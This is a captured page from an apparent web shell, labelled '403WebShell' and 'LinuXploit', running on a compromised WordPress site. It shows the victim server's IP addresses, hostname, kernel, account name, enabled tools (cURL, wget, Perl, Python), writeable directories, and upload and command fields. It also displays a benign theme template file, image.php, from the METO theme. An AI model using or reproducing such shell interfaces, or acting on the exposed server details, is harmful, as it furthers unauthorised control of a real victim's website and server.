Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.217.241.235
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wavevlvu/diixadigital.com/wp-content/themes/meto/templates/blog-single/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wavevlvu/diixadigital.com/wp-content/themes/meto/templates/blog-single/image.php
<?php
/**
 * Single Image File.
 *
 * @package METO
 * @author  Theme Kalia
 * @version 1.0
 */

?>
<?php
if (class_exists('Meto_Resizer')) {
    $img_obj = new Meto_Resizer();
}
$width = $data->get('sidebar') ? '769' : '1170';
$allowed_html = wp_kses_allowed_html('post');
?>


<div class="single-avatar singlee">
    <?php if (class_exists('Meto_Resizer')) : ?>

        <?php echo wp_kses($img_obj->resize(wp_get_attachment_url(get_post_thumbnail_id(get_the_ID()), 'full'), $width, 460, true), $allowed_html); ?>
    <?php else : ?>
        <?php the_post_thumbnail('full'); ?>
    <?php endif; ?>

    <?php if ($options->get('small_image') && has_post_thumbnail()) : ?>

        <span><?php echo get_avatar(get_the_author_meta('ID'), 41); ?></span>

    <?php endif; ?>

</div>

Youez - 2016 - github.com/yon3zu
LinuXploit